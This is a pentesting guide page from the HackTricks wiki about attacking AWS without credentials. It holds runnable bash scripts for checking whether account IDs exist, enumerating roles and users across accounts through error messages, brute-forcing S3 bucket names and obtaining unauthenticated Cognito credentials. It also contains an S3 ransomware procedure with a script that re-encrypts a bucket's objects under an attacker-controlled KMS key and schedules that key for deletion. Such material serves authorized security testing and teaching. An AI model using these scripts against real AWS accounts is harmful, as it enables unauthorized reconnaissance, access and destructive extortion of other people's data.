Support HackTricks and get benefits!
- If you want to see your company advertised in HackTricks or if you want access to the latest version of the PEASS or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
If you have a target, there are ways to try to identify account IDs of accounts related to it. Create a list of potential account IDs and aliases and check them:
```bash
# Check if an account ID exists
curl -v https://<account_id>.signin.aws.amazon.com
## If the response is a 404 it doesn't exist; if it's a 200, it exists
## It also works with account aliases
curl -v https://vodafone-uk2.signin.aws.amazon.com
```
You can automate this process with this tool.
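A minimal manual version of the same check can be sketched as follows (the helper function names are our own, not part of any official tool):

```bash
# Map the HTTP status of the signin endpoint to a verdict
classify_signin_status() {
  case "$1" in
    200) echo "exists" ;;
    404) echo "does not exist" ;;
    *)   echo "unknown ($1)" ;;
  esac
}

# Works for both account IDs and account aliases
check_signin() {
  local code
  code=$(curl -s -o /dev/null -w '%{http_code}' \
           "https://$1.signin.aws.amazon.com")
  echo "$1: $(classify_signin_status "$code")"
}

# Usage: while read -r c; do check_signin "$c"; done < candidates.txt
```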
Look for URLs that contain `<alias>.signin.aws.amazon.com`, with an alias related to the organization.
If a vendor has instances in the marketplace, you can get the owner ID (account ID) of the AWS account they used.
- Public EBS snapshots (EC2 -> Snapshots -> Public Snapshots)
- RDS public snapshots (RDS -> Snapshots -> All Public Snapshots)
- Public AMIs (EC2 -> AMIs -> Public images)
Many AWS error messages (even access denied ones) will disclose that information.
{% hint style="danger" %}
This technique doesn't work anymore: whether or not the role exists, you always get this error:

```
An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::947247140022:user/testenv is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::429217632764:role/account-balanceasdas
```

You can test this by running:

```bash
aws sts assume-role --role-arn arn:aws:iam::412345678909:role/superadmin --role-session-name s3-access-example
```
{% endhint %}
If you try to assume a role that you don’t have permissions to, AWS will output an error similar to:
```
An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::012345678901:user/MyUser is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::111111111111:role/aws-service-role/rds.amazonaws.com/AWSServiceRoleForRDS
```
This error message indicates that the role exists, but its assume role policy document does not allow you to assume it. By running the same command, but targeting a role that does not exist, AWS will return:
```
An error occurred (AccessDenied) when calling the AssumeRole operation: Not authorized to perform sts:AssumeRole
```
Surprisingly, this process works cross-account. Given any valid AWS account ID and a well-tailored wordlist, you can enumerate the account’s existing roles without restrictions.
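The two error messages can be told apart programmatically; a minimal sketch (the function names are our own):

```bash
# "on resource" appears in the error only when the target role exists
classify_assume_error() {
  case "$1" in
    *"sts:AssumeRole on resource"*)               echo "role exists" ;;
    *"Not authorized to perform sts:AssumeRole"*) echo "role does not exist" ;;
    *)                                            echo "unknown" ;;
  esac
}

# Try one candidate role name in a target account
enum_role() {
  local arn="arn:aws:iam::$1:role/$2" err
  err=$(aws sts assume-role --role-arn "$arn" \
          --role-session-name enum 2>&1 >/dev/null)
  [ "$(classify_assume_error "$err")" = "role exists" ] && echo "[+] $arn"
}

# Usage: while read -r r; do enum_role 111111111111 "$r"; done < wordlist.txt
```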
You can use this script to enumerate potential principals abusing this issue.
When setting up or updating an IAM role trust policy, you specify which AWS resources/services can assume that role and gain temporary credentials.
When you save the policy, if the resource is found, the trust policy will save successfully, but if it is not found, then an error will be thrown, indicating an invalid principal was supplied.
{% hint style="warning" %}
Note that in that resource you can specify a cross-account role or user:

```
arn:aws:iam::acc_id:role/role_name
arn:aws:iam::acc_id:user/user_name
```
{% endhint %}
This is a policy example:

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::216825089941:role/Test"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}
```
That is the error you will find if you use a role that doesn't exist. If the role exists, the policy will be saved without any errors. (The error shown is for an update, but it also works when creating.)
```bash
### You could also use: aws iam update-assume-role-policy

# When it works
aws iam create-role --role-name Test-Role --assume-role-policy-document file://a.json
{
    "Role": {
        "Path": "/",
        "RoleName": "Test-Role",
        "RoleId": "AROA5ZDCUJS3DVEIYOB73",
        "Arn": "arn:aws:iam::947247140022:role/Test-Role",
        "CreateDate": "2022-05-03T20:50:04Z",
        "AssumeRolePolicyDocument": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Effect": "Allow",
                    "Principal": {
                        "AWS": "arn:aws:iam::316584767888:role/account-balance"
                    },
                    "Action": [
                        "sts:AssumeRole"
                    ]
                }
            ]
        }
    }
}

# When it doesn't work
aws iam create-role --role-name Test-Role2 --assume-role-policy-document file://a.json

An error occurred (MalformedPolicyDocument) when calling the CreateRole operation: Invalid principal in policy: "AWS":"arn:aws:iam::316584767888:role/account-balanceefd23f2"
```
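A minimal loop around `update-assume-role-policy` might look like this (it assumes you own a role called `Test-Role`; helper names are our own):

```bash
# Build a trust policy for one candidate principal ARN
build_trust_policy() {
  printf '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"AWS":"%s"},"Action":"sts:AssumeRole"}]}' "$1"
}

# Try the candidate against a role you own
enum_principal() {
  local err
  err=$(aws iam update-assume-role-policy --role-name Test-Role \
          --policy-document "$(build_trust_policy "$1")" 2>&1)
  case "$err" in
    *MalformedPolicyDocument*) : ;;   # invalid principal -> doesn't exist
    *)                         echo "[+] Exists: $1" ;;
  esac
}

# Usage: enum_principal arn:aws:iam::316584767888:role/account-balance
```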
You can automate this process with https://github.com/carlospolop/aws_tools:

```bash
bash unauth_iam.sh -t user -i 316584767888 -r TestRole -w ./unauth_wordlist.txt
```
Or using Pacu:

```bash
run iam__enum_users --role-name admin --account-id 229736458923 --word-list /tmp/names.txt
run iam__enum_roles --role-name admin --account-id 229736458923 --word-list /tmp/names.txt
```
- The `admin` role used in the examples is a role in your account that Pacu will impersonate to create the policies it needs for the enumeration.
If the role is misconfigured and allows anyone to assume it, the attacker could simply escalate to it.
A bucket is considered “public” if any user can list the contents of the bucket, and “private” if the bucket's contents can only be listed or written by certain users.
Companies might have bucket permissions misconfigured, giving access either to everything or to everyone authenticated in AWS in any account (so to anyone). Note that even with such misconfigurations some actions might not be performable, as buckets might have their own access control lists (ACLs).
Learn about AWS-S3 misconfiguration here: http://flaws.cloud and http://flaws2.cloud/
Different methods to find when a webpage is using AWS to store some resources:

- Using the wappalyzer browser plugin
- Using Burp (spidering the web) or manually navigating through the page; all loaded resources will be saved in the History.
- Check for resources in domains like:
  - http://s3.amazonaws.com/[bucket_name]/
  - http://[bucket_name].s3.amazonaws.com/
- Check for CNAMEs, as `resources.domain.com` might have the CNAME `bucket.s3.amazonaws.com`
- Check https://buckets.grayhatwarfare.com, a web with already discovered open buckets.
- The bucket name and the bucket domain name need to be the same.
- flaws.cloud is at IP 52.92.181.107, and if you go there it redirects you to https://aws.amazon.com/s3/. Also, `dig -x 52.92.181.107` gives `s3-website-us-west-2.amazonaws.com`.
- To check it's a bucket you can also visit https://flaws.cloud.s3.amazonaws.com/.
You can find buckets by brute-forcing names related to the company you are pentesting:
- https://github.com/sa7mon/S3Scanner
- https://github.com/clario-tech/s3-inspector
- https://github.com/jordanpotti/AWSBucketDump (Contains a list with potential bucket names)
- https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets
- https://github.com/smaranchand/bucky
- https://github.com/tomdev/teh_s3_bucketeers
- https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/s3
```bash
# Generate a wordlist to create permutations
curl -s https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt > /tmp/words-s3.txt.temp
curl -s https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt >> /tmp/words-s3.txt.temp
cat /tmp/words-s3.txt.temp | sort -u > /tmp/words-s3.txt

# Generate a wordlist based on the domains and subdomains to test
## Write those domains and subdomains in subdomains.txt
cat subdomains.txt > /tmp/words-hosts-s3.txt
cat subdomains.txt | tr "." "-" >> /tmp/words-hosts-s3.txt
cat subdomains.txt | tr "." "\n" | sort -u >> /tmp/words-hosts-s3.txt

# Create permutations based on a list with the domains and subdomains to attack
goaltdns -l /tmp/words-hosts-s3.txt -w /tmp/words-s3.txt -o /tmp/final-words-s3.txt.temp
## The previous tool is specialized in creating permutations for subdomains, let's filter that list
### Remove lines ending with "."
cat /tmp/final-words-s3.txt.temp | grep -Ev "\.$" > /tmp/final-words-s3.txt.temp2
### Create a list without TLDs
cat /tmp/final-words-s3.txt.temp2 | sed -E 's/\.[a-zA-Z0-9]+$//' > /tmp/final-words-s3.txt.temp3
### Create a list without dots
cat /tmp/final-words-s3.txt.temp3 | tr -d "." > /tmp/final-words-s3.txt.temp4
### Create a list with hyphens instead of dots
cat /tmp/final-words-s3.txt.temp3 | tr "." "-" > /tmp/final-words-s3.txt.temp5

## Generate the final wordlist
cat /tmp/final-words-s3.txt.temp2 /tmp/final-words-s3.txt.temp3 /tmp/final-words-s3.txt.temp4 /tmp/final-words-s3.txt.temp5 | grep -v -- "-\." | awk '{print tolower($0)}' | sort -u > /tmp/final-words-s3.txt

## Call s3scanner
s3scanner --threads 100 scan --buckets-file /tmp/final-words-s3.txt | grep bucket_exists
```
You can find all the regions supported by AWS at https://docs.aws.amazon.com/general/latest/gr/s3.html
You can get the region of a bucket with `dig` and `nslookup` by doing a DNS request on the discovered IP:
```bash
dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud.    5    IN    A    52.218.192.11

nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa    name = s3-website-us-west-2.amazonaws.com.
```
Check that the resolved domain has the word "website".
You can access the static website by going to `flaws.cloud.s3-website-us-west-2.amazonaws.com`,
or you can access the bucket by visiting `flaws.cloud.s3-us-west-2.amazonaws.com`.
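The PTR-based region lookup can be scripted as follows (`parse_s3_region` and `bucket_region` are our own helpers; the regex assumes the usual `amazonaws.com` PTR naming):

```bash
# Extract the region from the s3 / s3-website PTR name
parse_s3_region() {
  printf '%s\n' "$1" |
    sed -E 's/^s3(-website)?[.-]([a-z0-9-]+)\.amazonaws\.com\.?$/\2/'
}

bucket_region() {
  local ip ptr
  ip=$(dig +short "$1" | head -n1)   # resolve the bucket's IP
  ptr=$(dig +short -x "$ip")         # reverse-resolve it
  parse_s3_region "$ptr"
}

# Usage: bucket_region flaws.cloud   # per the output above: us-west-2
```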
If you try to access a bucket but in the domain name you specify another region (for example, the bucket is in `bucket.s3.amazonaws.com` but you try to access `bucket.s3-website-us-west-2.amazonaws.com`), then you will be pointed to the correct location.
To test the openness of the bucket a user can just enter the URL in their web browser. A private bucket will respond with "Access Denied". A public bucket will list the first 1,000 objects that have been stored.
Open to everyone:
Private:
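The openness check can be scripted with `curl` (the helper names are our own): a 200 means the bucket is listable, a 403 means it exists but is private, and a 404 means it doesn't exist.

```bash
# Map the S3 HTTP status code to a verdict
classify_bucket_status() {
  case "$1" in
    200) echo "public (listable)" ;;
    403) echo "exists, access denied" ;;
    404) echo "does not exist" ;;
    *)   echo "unknown ($1)" ;;
  esac
}

check_bucket() {
  local code
  code=$(curl -s -o /dev/null -w '%{http_code}' "https://$1.s3.amazonaws.com/")
  echo "$1: $(classify_bucket_status "$code")"
}

# Usage: check_bucket flaws.cloud
```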
You can also check this with the cli:
```bash
# Use --no-sign-request to check everyone's permissions
# Use --profile <PROFILE_NAME> to indicate the AWS profile (keys) you want to use: check for "Any Authenticated AWS User" permissions
# Use --recursive if you want to list recursively
# Optionally you can specify the region if you know it
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [--recursive] [--region us-west-2]
```
If the bucket doesn't have a domain name, when trying to enumerate it only put the bucket name and not the whole AWS S3 domain. Example: `s3://<BUCKETNAME>`
- Attacker creates a KMS key in their own “personal” AWS account (or another compromised account) and provides “the world” access to use that KMS key for encryption. This means that it could be used by any AWS user/role/account to encrypt, but not decrypt objects in S3.
- Attacker identifies a target S3 bucket and gains write-level access to it, which is possible through a variety of different means. This could include poor configuration on buckets that expose them publicly or an attacker gaining access to the AWS environment itself. Typically attackers would target buckets with sensitive information, such as PII, PHI, logs, backups, and more.
- Attacker checks the configuration of the bucket to determine if it is able to be targeted by ransomware. This would include checking if S3 Object Versioning is enabled and if multi-factor authentication delete (MFA delete) is enabled. If Object Versioning is not enabled, then they are good to go. If Object Versioning is enabled, but MFA delete is disabled, the attacker can just disable the Object Versioning. If both Object Versioning and MFA delete are enabled, it would require a lot of extra work to be able to ransomware that specific bucket.
- Attacker uses the AWS API to replace each object in a bucket with a new copy of itself, but this time, it is encrypted with the attacker's KMS key.
- Attacker schedules the deletion of the KMS key that was used for this attack, giving a 7 day window to their target until the key is deleted and the data is lost forever.
- Attacker uploads a final file such as “ransom-note.txt” without encryption, which instructs the target on how to get their files back.
The following screenshot shows an example of a file that was targeted for a ransomware attack. As you can see, the account ID that owns the KMS key that was used to encrypt the object (7**********2) is different than the account ID of the account that owns the object (2**********1).
Here you can find a ransomware example that does the following:
- Gathers the first 100 objects in the bucket (or all, if fewer than 100 objects in the bucket)
- One by one, overwrites each object with itself using the new KMS encryption key
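The re-encryption step could be sketched as below (bucket name and key ARN are placeholders; the sketch assumes object keys without whitespace, and should only ever be run against infrastructure you own):

```bash
# Build the `aws s3 cp` arguments that copy an object onto itself with
# SSE-KMS forced to the attacker's key
kms_cp_args() {
  printf '%s' "s3://$1/$2 s3://$1/$2 --sse aws:kms --sse-kms-key-id $3"
}

ransom_bucket() {
  local bucket="$1" key_arn="$2"
  # First 100 object keys, one per line
  aws s3api list-objects-v2 --bucket "$bucket" --max-items 100 \
      --query 'Contents[].Key' --output text | tr '\t' '\n' |
  while read -r obj; do
    # Word-splitting of the built arguments is intentional here
    aws s3 cp $(kms_cp_args "$bucket" "$obj" "$key_arn")
  done
}
```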
For more info check the original research.
Cognito is an AWS service that enables developers to grant their app users access to AWS services. Developers grant IAM roles to authenticated users in their app (potentially people will be able to just sign up), and they can also grant an IAM role to unauthenticated users.
For basic info about Cognito check:
{% content-ref url="aws-services/aws-cognito-enum/" %} aws-cognito-enum {% endcontent-ref %}
Identity Pools can grant IAM roles to unauthenticated users that just know the Identity Pool ID (which is fairly common to find); an attacker with this info could try to access that IAM role and exploit it.
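A sketch of grabbing the unauthenticated role's credentials from a known Identity Pool ID (the pool ID format `region:uuid` lets us derive the region; depending on your setup these calls may require some dummy credentials to be configured):

```bash
# The Identity Pool ID embeds its region before the colon
pool_region() { printf '%s' "${1%%:*}"; }

get_unauth_creds() {
  local pool="$1" region id
  region=$(pool_region "$pool")
  # Ask Cognito for an identity ID, then for its temporary credentials
  id=$(aws cognito-identity get-id --identity-pool-id "$pool" \
         --region "$region" --query IdentityId --output text)
  aws cognito-identity get-credentials-for-identity \
    --identity-id "$id" --region "$region"
}

# Usage (made-up pool ID):
# get_unauth_creds "us-east-1:aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee"
```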
Moreover, IAM roles could also be assigned to authenticated users that access the Identity Pool. If an attacker can register a user or already has access to the identity provider used in the identity pool, they could access the IAM role being given to authenticated users and abuse its privileges.
By default Cognito allows registering new users. Being able to register a user might give you access to the underlying application, or to the authenticated IAM access role of an Identity Pool that accepts the Cognito User Pool as identity provider. Check how to do that here.
AWS allows giving anyone access to download AMIs and snapshots. You can list these resources very easily from your own account:
```bash
# Public AMIs
aws ec2 describe-images --executable-users all
## Search AMI by ownerID
aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLocation, `967541184254/`) == `true`]'
## Search AMI by substr ("shared" in the example)
aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLocation, `shared`) == `true`]'

# Public EBS snapshots (hard-drive copies)
aws ec2 describe-snapshots --restorable-by-user-ids all
aws ec2 describe-snapshots --restorable-by-user-ids all | jq '.Snapshots[] | select(.OwnerId == "099720109477")'

# Public RDS snapshots
aws rds describe-db-snapshots --include-public
## Search by account ID
aws rds describe-db-snapshots --include-public --query 'DBSnapshots[?contains(DBSnapshotIdentifier, `284546856933:`) == `true`]'
## To share an RDS snapshot with everybody, the RDS DB cannot be encrypted (so the snapshot won't be encrypted)
## To share an encrypted RDS snapshot you need to also share the KMS key with the account
```
In the talk Breaking the Isolation: Cross-Account AWS Vulnerabilities it's presented how some services allow(ed) any AWS account to access them, because AWS services were allowed as principals without specifying account IDs.
During the talk several examples are given, such as S3 buckets allowing CloudTrail (of any AWS account) to write to them:
Other services found vulnerable:
- AWS Config
- Serverless repository
The service ARN format is as follows:

```
arn:aws:[service]:[region]:[account-id]:[resource]
```

This is easily brute-forceable if we focus on some specific services: we know all the regions (some services are global and don't even need a region), we have the account ID, and we have prepared a wordlist to brute-force the resource name.
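The brute-force candidates can be generated by expanding that template over regions and a resource wordlist (the region list below is a small sample, and `gen_arns` is our own helper):

```bash
# Expand arn:aws:[service]:[region]:[account-id]:[resource] over a few
# regions and the resource names given as arguments
gen_arns() {
  local service="$1" account="$2"; shift 2
  local region res
  for region in us-east-1 us-west-2 eu-west-1; do  # extend as needed
    for res in "$@"; do
      printf 'arn:aws:%s:%s:%s:%s\n' "$service" "$region" "$account" "$res"
    done
  done
}

# Usage: gen_arns sqs 123456789012 prod-queue dev-events
```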
| Service | URL format |
| --- | --- |
| cloud9 | https://{random_id}.vfs.cloud9.{region}.amazonaws.com |
| cloudfront | https://{random_id}.cloudfront.net |
| cloudsearch | https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com |
| cloudsearch | {name}-{random}.{region}.cloudsearch.amazonaws.com |
| documentdb | {name}.cluster-{random}.{region}.docdb.amazonaws.com |
| ec2 | ec2-{ip-separated}.compute-1.amazonaws.com |
| elb | http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443 |
| elbv2 | https://{user_provided}-{random_id}.{region}.elb.amazonaws.com |
| es | https://{user_provided}-{random_id}.{region}.es.amazonaws.com |
| execute-api | https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided} |
| iot | mqtt://{random_id}.iot.{region}.amazonaws.com:8883 |
| iot | https://{random_id}.iot.{region}.amazonaws.com:8443 |
| iot | https://{random_id}.iot.{region}.amazonaws.com:443 |
| kafka | b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com |
| kafka | {user_provided}.{random_id}.c{1,2}.kafka.us-east-1.amazonaws.com |
| kinesisvideo | https://{random_id}.kinesisvideo.{region}.amazonaws.com |
| mediaconvert | https://{random_id}.mediaconvert.{region}.amazonaws.com |
| mediapackage | https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel |
| mediastore | https://{random_id}.data.mediastore.{region}.amazonaws.com |
| mq | https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162 |
| mq | ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617 |
| managed elasticsearch | https://vpc-{user_provided}-{random}.{region}.es.amazonaws.com |
| managed elasticsearch | https://search-{user_provided}-{random}.{region}.es.amazonaws.com |
| rabbitmq | https://b-{random_id}.mq.{region}.amazonaws.com |
| rds | mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306 |
| rds | postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432 |
| redshift | {user_provided}.{random}.{region}.redshift.amazonaws.com |
| route 53 | {user_provided} |
| s3 | https://{user_provided}.s3.amazonaws.com |
| sqs | https://sqs.{region}.amazonaws.com/{account-id}/{user_provided} |
| transfer | sftp://s-{random_id}.server.transfer.{region}.amazonaws.com |
You can find even more exposable services in:
{% embed url="https://github.com/SummitRoute/aws_exposable_resources" %}
- cloud_enum: Multi-cloud OSINT tool. Find public resources in AWS, Azure, and Google Cloud. Supported AWS services: Open / Protected S3 Buckets, awsapps (WorkMail, WorkDocs, Connect, etc.)
- https://www.youtube.com/watch?v=8ZXRw4Ry3mQ
- https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/
- https://hackingthe.cloud/aws/enumeration/enum_iam_user_role/
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md